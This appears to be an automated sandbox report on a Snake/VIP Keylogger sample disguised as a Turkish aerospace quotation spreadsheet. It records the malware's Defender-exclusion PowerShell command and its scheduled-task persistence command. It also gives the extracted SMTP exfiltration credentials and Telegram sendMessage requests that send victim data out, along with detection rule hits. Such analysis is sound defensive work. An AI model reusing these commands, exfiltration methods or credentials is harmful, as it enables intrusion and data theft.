Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ParentProcessId: 2248, ParentProcessName: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp", ProcessId: 2036, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ParentProcessId: 2248, ParentProcessName: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe", ProcessId: 6184, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ParentProcessId: 2248, ParentProcessName: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp", ProcessId: 2036, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T14:14:03.437400+0100	2803305	3	Unknown Traffic	192.168.2.6	49715	104.21.48.1	443	TCP
2025-01-14T14:14:04.729960+0100	2803305	3	Unknown Traffic	192.168.2.6	49720	104.21.48.1	443	TCP
2025-01-14T14:14:07.627405+0100	2803305	3	Unknown Traffic	192.168.2.6	49742	104.21.48.1	443	TCP
2025-01-14T14:14:08.631662+0100	2803305	3	Unknown Traffic	192.168.2.6	49756	104.21.48.1	443	TCP
2025-01-14T14:14:14.244341+0100	2803305	3	Unknown Traffic	192.168.2.6	49808	104.21.48.1	443	TCP
2025-01-14T14:14:15.543423+0100	2803305	3	Unknown Traffic	192.168.2.6	49822	104.21.48.1	443	TCP
2025-01-14T14:14:16.835768+0100	2803305	3	Unknown Traffic	192.168.2.6	49831	104.21.48.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T14:14:01.732780+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49713	132.226.247.73	80	TCP
2025-01-14T14:14:02.909707+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49713	132.226.247.73	80	TCP
2025-01-14T14:14:04.326550+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49717	132.226.247.73	80	TCP
2025-01-14T14:14:06.139045+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49727	132.226.247.73	80	TCP
2025-01-14T14:14:07.029675+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49727	132.226.247.73	80	TCP
2025-01-14T14:14:08.373419+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49749	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T14:14:13.415107+0100	1810007	1	Potentially Bad Traffic	192.168.2.6	49799	149.154.167.220	443	TCP
2025-01-14T14:14:17.738147+0100	1810007	1	Potentially Bad Traffic	192.168.2.6	49836	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Virustotal: Detection: 35%			Perma Link

Multi AV Scanner detection for submitted file

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Virustotal: Detection: 35%			Perma Link
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49714 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49734 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49836 version: TLS 1.2

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cKOJ.pdbSHA256z source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, xSjByRHuwGV.exe.0.dr
Source:	Binary string: cKOJ.pdb source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, xSjByRHuwGV.exe.0.dr

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 07A832E8h	0_2_07A8340E
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 02E2F8E9h	10_2_02E2F631
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 02E2FD41h	10_2_02E2FA88
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554E959h	10_2_0554E6B0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554D7F9h	10_2_0554D550
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 055431E0h	10_2_05542DC8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 055431E0h	10_2_05542DBE
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554CF49h	10_2_0554CCA0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554F209h	10_2_0554EF60
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_05540673
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554E0A9h	10_2_0554DE00
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 05542C19h	10_2_05542968
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 055431E0h	10_2_0554310E
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554DC51h	10_2_0554D9A8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_05540853
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_05540040
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554FAB9h	10_2_0554F810
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554D3A1h	10_2_0554D0F8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554EDB1h	10_2_0554EB08
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 05540D0Dh	10_2_05540B30
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 05541697h	10_2_05540B30
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554F661h	10_2_0554F3B8
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 4x nop then jmp 0554E501h	10_2_0554E258
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 02FEF8E9h	15_2_02FEF631
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 02FEFD41h	15_2_02FEFA88
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D131E0h	15_2_06D12DC8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1F661h	15_2_06D1F3B8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D10D0Dh	15_2_06D10B30
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D11697h	15_2_06D10B30
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D12C19h	15_2_06D12968
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1E959h	15_2_06D1E6B0
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1E0A9h	15_2_06D1DE00
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1F209h	15_2_06D1EF60
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1CF49h	15_2_06D1CCA0
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D131E0h	15_2_06D12DBE
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1D7F9h	15_2_06D1D550
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1E501h	15_2_06D1E258
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1EDB1h	15_2_06D1EB08
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1D3A1h	15_2_06D1D0F8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_06D10040
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1FAB9h	15_2_06D1F810
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D1DC51h	15_2_06D1D9A8
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Code function: 4x nop then jmp 06D131E0h	15_2_06D1310E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49799 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49836 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2014/01/2025%20/%2020:18:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2014/01/2025%20/%2020:48:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49717 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49713 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49727 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49749 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49742 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49720 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49808 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49831 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49756 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49822 -> 104.21.48.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49714 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49734 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
